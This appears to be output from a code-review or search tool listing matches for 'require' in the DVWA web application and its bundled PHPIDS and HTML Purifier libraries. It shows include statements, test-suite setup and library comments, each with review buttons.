./vulnerabilities/upload/index.php:30 (19/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/upload/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'upload';
33-$page[ 'source_button' ] = 'upload';
./vulnerabilities/view_help.php:4 (20/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:4 (21/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli/index.php:30 (22/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli';
33-$page[ 'source_button' ] = 'sqli';
./vulnerabilities/view_source_all.php:3 (23/99) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./vulnerabilities/xss_s/index.php:4 (24/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_s/index.php:30 (25/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_s/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_s';
33-$page[ 'source_button' ] = 'xss_s';
./vulnerabilities/xss_r/index.php:4 (26/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/xss_r/index.php:30 (27/99) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/xss_r/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'xss_r';
33-$page[ 'source_button' ] = 'xss_r';
./external/phpids/0.6/docs/examples/example.php:30 (28/99) OK | Dubious | Bad | Hide 
27-    session_start();
28-}
29-
30:require_once 'IDS/Init.php';
31-
32-try {
33-
./external/phpids/0.6/docs/examples/example.php:87 (29/99) OK | Dubious | Bad | Hide 
84-        /*
85-        * The following steps are optional to log the results
86-        */
87:        require_once 'IDS/Log/File.php';
88:        require_once 'IDS/Log/Composite.php';
89-
90-        $compositeLog = new IDS_Log_Composite();
91-        $compositeLog->addLogger(IDS_Log_File::getInstance($init));
./external/phpids/0.6/docs/examples/example.php:101 (30/99) OK | Dubious | Bad | Hide 
98-        */
99-        /*
100-        *
101:        require_once 'IDS/Log/Email.php';
102:        require_once 'IDS/Log/Database.php';
103-
104-        $compositeLog->addLogger(
105-            IDS_Log_Email::getInstance($init),
./external/phpids/0.6/docs/examples/cakephp/ids.php:114 (31/99) OK | Dubious | Bad | Hide 
111-        $path = get_include_path();
112-        set_include_path( VENDORS . 'phpids/');
113-
114:        #require the needed files
115-        vendor('phpids/IDS/Init');
116-
117-        #add request url and user agent
./external/phpids/0.6/tests/IDS/ReportTest.php:22 (32/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:ReportTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Report.php';
25:require_once 'IDS/Event.php';
26-
27-class IDS_ReportTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/MonitorTest.php:21 (33/99) OK | Dubious | Bad | Hide 
18- * @package	PHPIDS tests
19- * @version	SVN: $Id:MonitorTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21:require_once 'PHPUnit/Framework/TestCase.php';
22-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
23:require_once 'IDS/Monitor.php';
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Filter/Storage.php';
26-
27-class IDS_MonitorTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/IDS/EventTest.php:22 (34/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:EventTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Event.php';
25:require_once 'IDS/Filter.php';
26-
27-class IDS_EventTest extends PHPUnit_Framework_TestCase
28-{
./external/phpids/0.6/tests/IDS/ExceptionTest.php:22 (35/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:ExceptionTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26:require_once 'IDS/Report.php';
27:require_once 'IDS/Event.php';
28:require_once 'IDS/Filter.php';
29:require_once 'IDS/Monitor.php';
30:require_once 'IDS/Filter/Storage.php';
31-
32-class IDS_ExceptionTest extends PHPUnit_Framework_TestCase
33-{
./external/phpids/0.6/tests/IDS/FilterTest.php:22 (36/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:FilterTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_FilterTest extends PHPUnit_Framework_TestCase
27-	{
./external/phpids/0.6/tests/IDS/InitTest.php:22 (37/99) OK | Dubious | Bad | Hide 
19- * @version    SVN: $Id:InitTest.php 517 2007-09-15 15:04:13Z mario $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25-
26-class IDS_InitTest extends PHPUnit_Framework_TestCase {
27-
./external/phpids/0.6/tests/IDS/CachingTest.php:22 (38/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:CachingTest.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-
22:require_once 'PHPUnit/Framework/TestCase.php';
23-set_include_path(get_include_path() . PATH_SEPARATOR . dirname(__FILE__) . '/../../lib');
24:require_once 'IDS/Init.php';
25:require_once 'IDS/Caching/Factory.php';
26-
27-class IDS_CachingTest extends PHPUnit_Framework_TestCase {
28-
./external/phpids/0.6/tests/allTests.php:22 (39/99) OK | Dubious | Bad | Hide 
19- * @version	SVN: $Id:allTests.php 515 2007-09-15 13:43:40Z christ1an $
20- */
21-error_reporting(E_ALL | E_STRICT | @E_DEPRECATED);
22:require_once 'PHPUnit/Framework/TestSuite.php';
23:require_once 'PHPUnit/TextUI/TestRunner.php';
24:require_once 'PHPUnit/Util/Filter.php';
25-
26-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__));
27-PHPUnit_Util_Filter::addDirectoryToFilter(dirname(__FILE__) . '/../lib/IDS/vendors');
./external/phpids/0.6/tests/allTests.php:45 (40/99) OK | Dubious | Bad | Hide 
42-	public static function suite()
43-	{
44-        $suite = new PHPUnit_Framework_TestSuite('PHPIDS');
45:        require_once 'IDS/MonitorTest.php';
46-        $suite->addTestSuite('IDS_MonitorTest');
47:        require_once 'IDS/ReportTest.php';
48-        $suite->addTestSuite('IDS_ReportTest');
49:        require_once 'IDS/InitTest.php';
50-        $suite->addTestSuite('IDS_InitTest');
51:        require_once 'IDS/ExceptionTest.php';
52-        $suite->addTestSuite('IDS_ExceptionTest');
53:        require_once 'IDS/FilterTest.php';
54-        $suite->addTestSuite('IDS_FilterTest');
55:        require_once 'IDS/CachingTest.php';
56-        $suite->addTestSuite('IDS_CachingTest');
57:        require_once 'IDS/EventTest.php';
58-        $suite->addTestSuite('IDS_EventTest');
59-        return $suite;
60-	}
./external/phpids/0.6/lib/IDS/Filter/Storage.php:39 (41/99) OK | Dubious | Bad | Hide 
36- *
37- * This class provides various default functions for gathering filter patterns 
38- * to be used later on by the detection mechanism. You might extend this class 
39: * to your requirements.
40- *
41- * @category  Security
42- * @package   PHPIDS
./external/phpids/0.6/lib/IDS/Caching/Session.php:34 (42/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Memcached.php:34 (43/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/File.php:34 (44/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * File caching wrapper
./external/phpids/0.6/lib/IDS/Caching/Database.php:34 (45/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Caching/Interface.php';
35-
36-/**
37- * Needed SQL:
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/Validator.php:112 (46/99) OK | Dubious | Bad | Hide 
109-        // END - handled by InterchangeBuilder
110-        
111-        if (!is_null($d->allowed) || !empty($d->valueAliases)) {
112:            // allowed and valueAliases require that we be dealing with
113-            // strings, so check for that early.
114-            $d_int = HTMLPurifier_VarParser::$types[$d->type];
115-            if (!isset(HTMLPurifier_VarParser::$stringTypes[$d_int])) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ConfigSchema/InterchangeBuilder.php:77 (47/99) OK | Dubious | Bad | Hide 
74-    public function buildDirective($interchange, $hash) {
75-        $directive = new HTMLPurifier_ConfigSchema_Interchange_Directive();
76-        
77:        // These are required elements:
78-        $directive->id = $this->id($hash->offsetGet('ID'));
79-        $id = $directive->id->toString(); // convenience
80-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/SafeParam.php:6 (48/99) OK | Dubious | Bad | Hide 
3-/**
4- * Validates name/value pairs in param tags to be used in safe objects. This
5- * will only allow name values it recognizes, and pre-fill certain attributes
6: * with required values.
7- * 
8- * @note
9- *      This class only supports Flash. In the future, Quicktime support
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrTransform/ScriptRequired.php:4 (49/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * Implements required attribute stipulation for <script>
5- */
6-class HTMLPurifier_AttrTransform_ScriptRequired extends HTMLPurifier_AttrTransform
7-{
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/URIFilter.php:10 (50/99) OK | Dubious | Bad | Hide 
7- * including transformation or blacklisting.
8- * 
9- * @warning This filter is called before scheme object validation occurs.
10: *          Make sure, if you require a specific scheme object, you
11- *          you check that it exists. This allows filters to convert
12- *          proprietary URI schemes into regular ones.
13- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/CSS/FontFamily.php:76 (51/99) OK | Dubious | Bad | Hide 
73-                continue;
74-            }
75-            
76:            // complicated font, requires quoting
77-            
78-            // armor single quotes and new lines
79-            $font = str_replace("\\", "\\\\", $font);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef/URI/IPv6.php:6 (52/99) OK | Dubious | Bad | Hide 
3-/**
4- * Validates an IPv6 address.
5- * @author Feyd @ forums.devnetwork.net (public domain)
6: * @note This function requires brackets to have been removed from address
7- *       in URI.
8- */
9-class HTMLPurifier_AttrDef_URI_IPv6 extends HTMLPurifier_AttrDef_URI_IPv4
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:8 (53/99) OK | Dubious | Bad | Hide 
5- * 
6- * HTML elements dictate which elements are allowed to be their children,
7- * for example, you can't have a p tag in a span tag.  Other elements have
8: * much more rigorous definitions: tables, for instance, require a specific
9- * order for their elements.  There are also constraints not expressible by
10- * document type definitions, such as the chameleon nature of ins/del
11- * tags and global child exclusions.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/FixNesting.php:17 (54/99) OK | Dubious | Bad | Hide 
14- * nodes (not tokens) of the list of tokens and determine whether or not
15- * their children conform to the element's definition.  If they do not, the
16- * child definition may optionally supply an amended list of elements that
17: * is valid or require that the entire node be deleted (and the previous
18- * node rescanned).
19- * 
20- * The second objective is to ensure that explicitly excluded elements of
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Strategy/RemoveForeignElements.php:76 (55/99) OK | Dubious | Bad | Hide 
73-                if (isset($definition->info[$token->name])) {
74-                    
75-                    // mostly everything's good, but
76:                    // we need to make sure required attributes are in order
77-                    if (
78-                        ($token instanceof HTMLPurifier_Token_Start || $token instanceof HTMLPurifier_Token_Empty) &&
79:                        $definition->info[$token->name]->required_attr &&
80-                        ($token->name != 'img' || $remove_invalid_img) // ensure config option still works
81-                    ) {
82-                        $attr_validator->validateToken($token, $config, $context);
83-                        $ok = true;
84:                        foreach ($definition->info[$token->name]->required_attr as $name) {
85-                            if (!isset($token->attr[$name])) {
86-                                $ok = false;
87-                                break;
88-                            }
89-                        }
90-                        if (!$ok) {
91:                            if ($e) $e->send(E_ERROR, 'Strategy_RemoveForeignElements: Missing required attribute', $name);
92-                            continue;
93-                        }
94-                        $token->armor['ValidateAttributes'] = true;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLDefinition.php:371 (56/99) OK | Dubious | Bad | Hide 
368-        // setup injectors -----------------------------------------------------
369-        foreach ($this->info_injector as $i => $injector) {
370-            if ($injector->checkNeeded($config) !== false) {
371:                // remove injector that does not have it's required
372-                // elements/attributes present, and is thus not needed.
373-                unset($this->info_injector[$i]);
374-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Bootstrap.php:40 (57/99) OK | Dubious | Bad | Hide 
37-    public static function autoload($class) {
38-        $file = HTMLPurifier_Bootstrap::getPath($class);
39-        if (!$file) return false;
40:        require HTMLPURIFIER_PREFIX . '/' . $file;
41-        return true;
42-    }
43-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3723 (58/99) OK | Dubious | Bad | Hide 
3720-    }
3721-
3722-    private function clearTheActiveFormattingElementsUpToTheLastMarker() {
3723:        /* When the steps below require the UA to clear the list of active
3724-        formatting elements up to the last marker, the UA must perform the
3725-        following steps: */
3726-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3744 (59/99) OK | Dubious | Bad | Hide 
3741-    }
3742-
3743-    private function generateImpliedEndTags($exclude = array()) {
3744:        /* When the steps below require the UA to generate implied end tags,
3745-        then, if the current node is a dd element, a dt element, an li element,
3746-        a p element, a td element, a th  element, or a tr element, the UA must
3747-        act as if an end tag with the respective tag name had been seen and
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer/PH5P.php:3773 (60/99) OK | Dubious | Bad | Hide 
3770-    }
3771-
3772-    private function clearStackToTableContext($elements) {
3773:        /* When the steps above require the UA to clear the stack back to a
3774-        table context, it means that the UA must, while the current node is not
3775-        a table element or an html element, pop elements from the stack of open
3776-        elements. If this causes any elements to be popped from the stack, then
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ElementDef.php:75 (61/99) OK | Dubious | Bad | Hide 
72-    public $descendants_are_inline = false;
73-    
74-    /**
75:     * List of the names of required attributes this element has. Dynamically
76-     * populated by HTMLPurifier_HTMLDefinition::getElement
77-     */
78:    public $required_attr = array();
79-    
80-    /**
81-     * Lookup table of tags excluded from all descendants of this tag.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:94 (62/99) OK | Dubious | Bad | Hide 
91-            
92-            if (isset($processed[$def_i])) continue;
93-            
94:            // determine whether or not attribute is required
95:            if ($required = (strpos($def_i, '*') !== false)) {
96-                // rename the definition
97-                unset($attr[$def_i]);
98-                $def_i = trim($def_i, '*');
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:106 (63/99) OK | Dubious | Bad | Hide 
103-            
104-            // if we've already got a literal object, move on
105-            if (is_object($def)) {
106:                // preserve previous required
107:                $attr[$def_i]->required = ($required || $attr[$def_i]->required);
108-                continue;
109-            }
110-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrCollections.php:118 (64/99) OK | Dubious | Bad | Hide 
115-            
116-            if ($t = $attr_types->get($def)) {
117-                $attr[$def_i] = $t;
118:                $attr[$def_i]->required = $required;
119-            } else {
120-                unset($attr[$def_i]);
121-            }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Injector/AutoParagraph.php:314 (65/99) OK | Dubious | Bad | Hide 
311-    }
312-    
313-    /**
314:     * Determines if a particular token requires an earlier inline token
315-     * to get a paragraph. This should be used with _forwardUntilEndToken
316-     */
317-    private function _checkNeedsP($current) {
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:23 (66/99) OK | Dubious | Bad | Hide 
20- * convenience functions for subclasses.
21- * 
22- * @note The unit tests will instantiate this class for testing purposes, as
23: *       many of the utility functions require a class to be instantiated.
24- *       This means that, even though this class is not runnable, it will
25- *       not be declared abstract.
26- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Lexer.php:176 (67/99) OK | Dubious | Bad | Hide 
173-     */
174-    public function parseData($string) {
175-        
176:        // following functions require at least one character
177-        if ($string === '') return '';
178-        
179-        // subtracts amps that cannot possibly be escaped
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ContentSets.php:115 (68/99) OK | Dubious | Bad | Hide 
112-            return $value;
113-        }
114-        switch ($def->content_model_type) {
115:            case 'required':
116-                return new HTMLPurifier_ChildDef_Required($value);
117-            case 'optional':
118-                return new HTMLPurifier_ChildDef_Optional($value);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Bdo.php:19 (69/99) OK | Dubious | Bad | Hide 
16-        $bdo = $this->addElement(
17-            'bdo', 'Inline', 'Inline', array('Core', 'Lang'),
18-            array(
19:                'dir' => 'Enum#ltr,rtl', // required
20-                // The Abstract Module specification has the attribute
21-                // inclusions wrong for bdo: bdo allows Lang
22-            )
23-        );
24:        $bdo->attr_transform_post['required-dir'] = new HTMLPurifier_AttrTransform_BdoDir();
25-        
26-        $this->attr_collections['I18N']['dir'] = 'Enum#ltr,rtl';
27-    }
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/SafeObject.php:26 (70/99) OK | Dubious | Bad | Hide 
23-            'Optional: param | Flow | #PCDATA',
24-            'Common',
25-            array(
26:                // While technically not required by the spec, we're forcing
27-                // it to this value.
28-                'type'   => 'Enum#application/x-shockwave-flash',
29-                'width'  => 'Pixels#' . $max,
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:28 (71/99) OK | Dubious | Bad | Hide 
25-        // auto-wraps stray #PCDATA in a similar manner to 
26-        // blockquote's custom definition (we would use it but
27-        // blockquote's contents are optional while noscript's contents
28:        // are required)
29-        
30-        // TODO: convert this to new syntax, main problem is getting
31-        // both content sets working
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModule/Scripting.php:38 (72/99) OK | Dubious | Bad | Hide 
35-        $this->info['noscript'] = new HTMLPurifier_ElementDef();
36-        $this->info['noscript']->attr = array( 0 => array('Common') );
37-        $this->info['noscript']->content_model = 'Heading | List | Block';
38:        $this->info['noscript']->content_model_type = 'required';
39-        
40-        $this->info['script'] = new HTMLPurifier_ElementDef();
41-        $this->info['script']->attr = array(
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/HTMLModuleManager.php:390 (73/99) OK | Dubious | Bad | Hide 
387-        // mix it in with
388-        if (!$def) return false;
389-        
390:        // add information on required attributes
391-        foreach ($def->attr as $attr_name => $attr_def) {
392:            if ($attr_def->required) {
393:                $def->required_attr[] = $attr_name;
394-            }
395-        }
396-
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:340 (74/99) OK | Dubious | Bad | Hide 
337-     * @note This is a DUMB function: it has no concept of keeping
338-     *       character entities that the projected character encoding
339-     *       can allow. We could possibly implement a smart version
340:     *       but that would require it to also know which Unicode
341-     *       codepoints the charset supported (not an easy task).
342-     * @note Sort of with cleanUTF8() but it assumes that $str is
343-     *       well-formed UTF-8
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Encoder.php:379 (75/99) OK | Dubious | Bad | Hide 
376-    /**
377-     * This expensive function tests whether or not a given character
378-     * encoding supports ASCII. 7/8-bit encodings like Shift_JIS will
379:     * fail this test, and require special processing. Variable width
380-     * encodings shouldn't ever fail.
381-     * 
382-     * @param string $encoding Encoding name to test, as per iconv format
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/ChildDef/Required.php:32 (76/99) OK | Dubious | Bad | Hide 
29-        $this->elements = $elements;
30-    }
31-    public $allow_empty = false;
32:    public $type = 'required';
33-    public function validateChildren($tokens_of_children, $config, $context) {
34-        // if there are no tokens, delete parent node
35-        if (empty($tokens_of_children)) return false;
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Language/messages/en.php:28 (77/99) OK | Dubious | Bad | Hide 
25-'Lexer: Missing end quote'     => 'Attribute declaration has no end quote',
26-
27-'Strategy_RemoveForeignElements: Tag transform'              => '<$1> element transformed into $CurrentToken.Serialized',
28:'Strategy_RemoveForeignElements: Missing required attribute' => '$CurrentToken.Compact element missing required attribute $1',
29-'Strategy_RemoveForeignElements: Foreign element to text'    => 'Unrecognized $CurrentToken.Serialized tag converted to text',
30-'Strategy_RemoveForeignElements: Foreign element removed'    => 'Unrecognized $CurrentToken.Serialized tag removed',
31-'Strategy_RemoveForeignElements: Comment removed'            => 'Comment containing "$CurrentToken.Data" removed',
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:4 (78/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-/**
4: * Validates the attributes of a token. Doesn't manage required attributes
5- * very well. The only reason we factored this out was because RemoveForeignElements
6- * also needed it besides ValidateAttributes.
7- */
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrValidator.php:14 (79/99) OK | Dubious | Bad | Hide 
11-    /**
12-     * Validates the attributes of a token, returning a modified token
13-     * that has valid tokens
14:     * @param $token Reference to token to validate. We require a reference
15-     *     because the operation this class performs on the token are
16-     *     not atomic, so the context CurrentToken to be updated
17-     *     throughout
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/AttrDef.php:23 (80/99) OK | Dubious | Bad | Hide 
20-    public $minimized = false;
21-    
22-    /**
23:     * Tells us whether or not an HTML attribute is required. Has no
24-     * meaning in other contexts
25-     */
26:    public $required = false;
27-    
28-    /**
29-     * Validates and cleans passed string according to a definition.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Printer/HTMLDefinition.php:156 (81/99) OK | Dubious | Bad | Hide 
153-                $ret .= $this->element('td',$this->listifyAttr($def->attr), array(), 0);
154-            $ret .= $this->end('tr');
155-            
156:            if (!empty($def->required_attr)) {
157:                $ret .= $this->row('Required attributes', $this->listify($def->required_attr));
158-            }
159-            
160-            $ret .= $this->renderChildren($def->child);
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:6 (82/99) OK | Dubious | Bad | Hide 
3-/**
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6: * the core files required by HTML Purifier. Use this if performance is a
7- * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS
8- * FILE, changes will be overwritten the next time the script is run.
9- *
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.includes.php:14 (83/99) OK | Dubious | Bad | Hide 
11- * 
12- * @warning
13- *      You must *not* include any other HTML Purifier files before this file,
14: *      because 'require' not 'require_once' is used.
15- * 
16- * @warning
17: *      This file requires that the include path contains the HTML Purifier
18- *      library directory; this is not auto-set.
19- */
20-
21:require 'HTMLPurifier.php';
22:require 'HTMLPurifier/AttrCollections.php';
23:require 'HTMLPurifier/AttrDef.php';
24:require 'HTMLPurifier/AttrTransform.php';
25:require 'HTMLPurifier/AttrTypes.php';
26:require 'HTMLPurifier/AttrValidator.php';
27:require 'HTMLPurifier/Bootstrap.php';
28:require 'HTMLPurifier/Definition.php';
29:require 'HTMLPurifier/CSSDefinition.php';
30:require 'HTMLPurifier/ChildDef.php';
31:require 'HTMLPurifier/Config.php';
32:require 'HTMLPurifier/ConfigSchema.php';
33:require 'HTMLPurifier/ContentSets.php';
34:require 'HTMLPurifier/Context.php';
35:require 'HTMLPurifier/DefinitionCache.php';
36:require 'HTMLPurifier/DefinitionCacheFactory.php';
37:require 'HTMLPurifier/Doctype.php';
38:require 'HTMLPurifier/DoctypeRegistry.php';
39:require 'HTMLPurifier/ElementDef.php';
40:require 'HTMLPurifier/Encoder.php';
41:require 'HTMLPurifier/EntityLookup.php';
42:require 'HTMLPurifier/EntityParser.php';
43:require 'HTMLPurifier/ErrorCollector.php';
44:require 'HTMLPurifier/ErrorStruct.php';
45:require 'HTMLPurifier/Exception.php';
46:require 'HTMLPurifier/Filter.php';
47:require 'HTMLPurifier/Generator.php';
48:require 'HTMLPurifier/HTMLDefinition.php';
49:require 'HTMLPurifier/HTMLModule.php';
50:require 'HTMLPurifier/HTMLModuleManager.php';
51:require 'HTMLPurifier/IDAccumulator.php';
52:require 'HTMLPurifier/Injector.php';
53:require 'HTMLPurifier/Language.php';
54:require 'HTMLPurifier/LanguageFactory.php';
55:require 'HTMLPurifier/Length.php';
56:require 'HTMLPurifier/Lexer.php';
57:require 'HTMLPurifier/PercentEncoder.php';
58:require 'HTMLPurifier/Strategy.php';
59:require 'HTMLPurifier/StringHash.php';
60:require 'HTMLPurifier/StringHashParser.php';
61:require 'HTMLPurifier/TagTransform.php';
62:require 'HTMLPurifier/Token.php';
63:require 'HTMLPurifier/TokenFactory.php';
64:require 'HTMLPurifier/URI.php';
65:require 'HTMLPurifier/URIDefinition.php';
66:require 'HTMLPurifier/URIFilter.php';
67:require 'HTMLPurifier/URIParser.php';
68:require 'HTMLPurifier/URIScheme.php';
69:require 'HTMLPurifier/URISchemeRegistry.php';
70:require 'HTMLPurifier/UnitConverter.php';
71:require 'HTMLPurifier/VarParser.php';
72:require 'HTMLPurifier/VarParserException.php';
73:require 'HTMLPurifier/AttrDef/CSS.php';
74:require 'HTMLPurifier/AttrDef/Enum.php';
75:require 'HTMLPurifier/AttrDef/Integer.php';
76:require 'HTMLPurifier/AttrDef/Lang.php';
77:require 'HTMLPurifier/AttrDef/Switch.php';
78:require 'HTMLPurifier/AttrDef/Text.php';
79:require 'HTMLPurifier/AttrDef/URI.php';
80:require 'HTMLPurifier/AttrDef/CSS/Number.php';
81:require 'HTMLPurifier/AttrDef/CSS/AlphaValue.php';
82:require 'HTMLPurifier/AttrDef/CSS/Background.php';
83:require 'HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
84:require 'HTMLPurifier/AttrDef/CSS/Border.php';
85:require 'HTMLPurifier/AttrDef/CSS/Color.php';
86:require 'HTMLPurifier/AttrDef/CSS/Composite.php';
87:require 'HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
88:require 'HTMLPurifier/AttrDef/CSS/Filter.php';
89:require 'HTMLPurifier/AttrDef/CSS/Font.php';
90:require 'HTMLPurifier/AttrDef/CSS/FontFamily.php';
91:require 'HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
92:require 'HTMLPurifier/AttrDef/CSS/Length.php';
93:require 'HTMLPurifier/AttrDef/CSS/ListStyle.php';
94:require 'HTMLPurifier/AttrDef/CSS/Multiple.php';
95:require 'HTMLPurifier/AttrDef/CSS/Percentage.php';
96:require 'HTMLPurifier/AttrDef/CSS/TextDecoration.php';
97:require 'HTMLPurifier/AttrDef/CSS/URI.php';
98:require 'HTMLPurifier/AttrDef/HTML/Bool.php';
99:require 'HTMLPurifier/AttrDef/HTML/Color.php';
